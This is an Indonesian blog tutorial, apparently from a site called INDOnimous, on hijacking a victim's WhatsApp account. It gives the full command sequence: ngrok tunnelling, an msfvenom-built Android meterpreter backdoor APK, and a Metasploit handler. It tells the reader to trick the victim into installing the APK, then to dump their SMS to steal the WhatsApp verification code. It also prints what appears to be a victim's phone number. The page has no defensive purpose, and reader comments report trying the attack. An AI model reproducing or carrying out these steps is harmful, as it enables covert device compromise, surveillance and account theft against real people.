Cara hack whatsapp dengan termux |INDOnimous

Cara hack whatsapp dengan termux

Kali ini tutorial cara hack whatsapp dengan media apk backdoor

Yang kita buat Sendiri...

Cara buat tergolong sangat mudah...

Dan Banyak tutorial di luar Sana yang Gak work
Karena Banyak yang memanipulasi video nya..

OK kali ini Saya yakin 100% work tanpa basa basi..

Yang kita butuh Kan adalah...

1. Ngrok
2. Metasploit

Yang Belum punya ngrok nanti Saya sediakan di
Description Cara buatnya
==http://bit.ly/2ucII8Y===

Dan untuk metasploit Juga nanti Saya sediakan di
Description Cara install nya...
==http://bit.ly/2tY0o7i==


OK kita aktif Kan ngrok nya terlebih dahulu...

Dengan perintah

./ngrok tcp (port bebas)
Atau
. /ngrok http (port bebas)
Saya menggunakan
Baca juga :  Cara install metasploit 2019

./ngrok tcp 8181
Atau
./ngrok http 8181



Sama saja...

OK kita login ngrok dulu ya....
Kalian tunggu Hingga tulisan "Online"  berwarna hijau

Setelah itu kita masuk metasploit framework nya
Dengan ketik

cd metasploit-framework

Lalu ketik

msfconsole

OK kali tunggu aja...
BIAR Gak Lama kita lanjut ke next


Yang selanjutnya kita buat apk backdoor nya terlebih dahulu
Dengan perintah....

ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=12460 R> /sdcard/INDOnimous.apk


Jika sudah kita buat Apknya...

Kita tunggu proses pembuatan nya...

OK Apknya sudah jadi Mari kita liat.... Di sdcard masing masing


MARI KITA buat apk nya dan kirim ke korban

Setelah itu kita kirim ke korban
..
Kalian...

Jika susah... Kalian Rayu atau edit Apknya...

Kali ini akan Saya edit sedikit ya..

OK Ternyata sudah Dia install Mari kita mulai
Ketik di msf >

use expkoit/multi/handler

Setelah itu kita ketik

set payload android/meterpreter/reverse_tcp

Setelah itu kita ketik

set lhost 127.0.0.1

Setelah itu kita ketik

set Lport 8181

Tinggal kita exploit

Jika sudah muncul meterpreter

Berarti Anda berhasil...

Kita eksekusi WA nya

85694572756

Itu adalah WA korban saya

Setelah itu kita Cari notification nya

Dengan ketik
dump_sms

sms_dump_20180712201914.txt

Itu adalah kode ya... Yang harus kita buka terlebih dahulu

Dengan cara

open sms_dump_20180712201914.txt

Itu adalah kode nya... Mari kita coba
Ini adalah tampilan whatsapp korban



Setah ini kita bisa Lakukan apa saja Pada hp korban sebagai contoh

Ternyata Apknya udah di hapus

Sekian tutorial Dari Saya... Semoga bermanfaat...


Bay Bay....
Jangan lupa subscribe

6 Comments

  1. punya saya kok gak bisa di install?
    kesalahan parse terus

    ReplyDelete
  2. Ngrok saya merah terus pke vpn ttp sama bosqu

    ReplyDelete
  3. Ngrok saya merah terus pake vpn ttp sama

    ReplyDelete
  4. lama nunggu ngrok nya online,install ngrok udah,mestaploid udah,nunggu online nya lama ,ada saran?

    ReplyDelete
  5. Gw kira langsung ambil alih akunya ternyata sikorban harus install apk Dari kita..gw yakin tidak akan ada org yang mau minum racun

    ReplyDelete
Previous Post Next Post